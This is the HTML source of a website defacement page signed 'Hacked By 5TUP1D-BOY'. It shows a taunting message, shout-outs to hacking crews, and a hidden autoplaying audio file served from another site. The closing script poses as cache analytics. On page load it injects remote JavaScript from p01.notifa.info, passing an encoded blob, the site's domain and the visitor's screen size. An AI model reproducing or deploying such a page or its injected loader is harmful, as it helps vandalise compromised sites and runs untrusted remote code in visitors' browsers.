


<html>
   <head>
      <title> Hacked By 5TUP1D-BOY</title>
<link rel="icon" type="image/x-icon" href="https://i.pinimg.com/originals/a7/5f/83/a75f83fe67b4eb4b337073c1ddd07e44.jpg">
<meta content='>'Hacked By 5TUP1D-BOY' name='description'/>
<meta content='Hacked By 5TUP1D-BOY' name='keywords'/>
<meta content='Hacked By 5TUP1D-BOY ' name='Abstract'/>
<meta name="title" content="Hacked By 5TUP1D-BOY">
<meta name="description" content="Hacked By 5TUP1D-BOY">
<meta name="keywords" content="Hacked By 5TUP1D-BOY">
<meta name="googlebot" content="index,follow"/>
<meta name="robots" content="all"/>
<meta name="robots schedule" content="auto"/>
<meta name="distribution" content="global"/>
<meta contact='#'/>
  <style>
            html, body {
                background-color: #000
               ;
                color: #636b6f;
                font-family: 'Fredericka the Great', sans-serif;
                font-weight: 100;
                height: 100vh;
                margin: 0;
            }

            .full-height {
                height: 100vh;
            }

            .flex-center {
                align-items: center;
                display: flex;
                justify-content: center;
            }

            .position-ref {
                position: relative;
            }

            .content {
                text-align: center;
            }

            .title {
                font-size: 36px;
                padding: 20px;
            }
        </style> 

    </head>

<body align="center" oncontextmenu="return false" bgcolor="black"><div class="error">
<script type="text/javascript">
</script>
<div class="flex-center position-ref full-height">
            <div class="content">
     <embed src="http://ptpn5.co.id/disposisi/feast.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0">
<center>
<table height="100%" width="100%"><td align="centeR"><img height="500" width="500" src="https://i.pinimg.com/originals/a7/5f/83/a75f83fe67b4eb4b337073c1ddd07e44.jpg" />
                <div class="text"> 
                    <font color="white"><code><font size="6"><i>Hacked By 5TUP1D-BOY<br> </div>
                    <font color="white"><code><font size="6"><i><br> </div>
                    <font color="white"><code><font size="6"><i>Do You Still Remember Me..?<br> </div>
                    <font color="white"><code><font size="6"><i><br> </div>
                    <font color="white"><code><font size="6"><i><br>666hostHere502 - Xeit666host - T14RB373T - Mr.L3gacy - Mr.Donuts - ./PenggilaJav07 - HellMe - Unational - NoiseCrusT -  5TUP1D-B0Y </div>
                    <font color="white"><code><font size="6"><i><br> </div>
                    <font color="white"><code><font size="6"><i>Garuda Security Hacker - AnarchoXploit - Phantom Ghost - Hidden Ghost Team - Lamongan Xploiter - Hunter Security Crew<br></div>
</div>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXsYOfquZtPKFLpK6AtuBmootic1sQbFquVshyTzt9%2bV%2fO6%2fyffeFdtMwceXs17%2fX97Pp7u4JJOc8xa63EZEGT4zZYd%2byEYhd5u8oq%2fzVh%2fSPlxouWVj1eUv2mrvb8FJXBPSog7PRy81MZLMpCDdzrzh%2bCAcgm251JoJBb3LPS%2fQOXkFTKMfEOMtDNFTY5b%2fQZx%2fXJT1H5%2fX%2bMcHcfeVzdVbZxxy9Oa5eF4STmqiU0OMy71%2flndlOCiTbleh4BLoHcx8TWj%2f88WfogVlzr4J0Epljkbg8uY%2bG2WkN2XKsm97XYJoCxxOm123r9gWu5Qjd75I%2bgodpEmR8LbaYFKWsMXPzgrpEW6Llw%2fz4n5QdQ36ouUzBrtaQApdYDdjz5opbWGhx59o%2ffPq2NzgbVpjm1cUj5T3p5AgrtRiXlg64SNUxkM5DajWZWR8xt7C%2fNxZ2OHk3vMEiXmmf2WNHWnACz%2fENR5Jnigu4B%2fq0vdIYXvA9s1O4sTlQlftSTZT7wR2UaiuzPecUkbKd8xP1sJ0W7ZTV4swgs16XKIv4v4x317cYmRHtALcQg9xqrDIMcl8oS" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
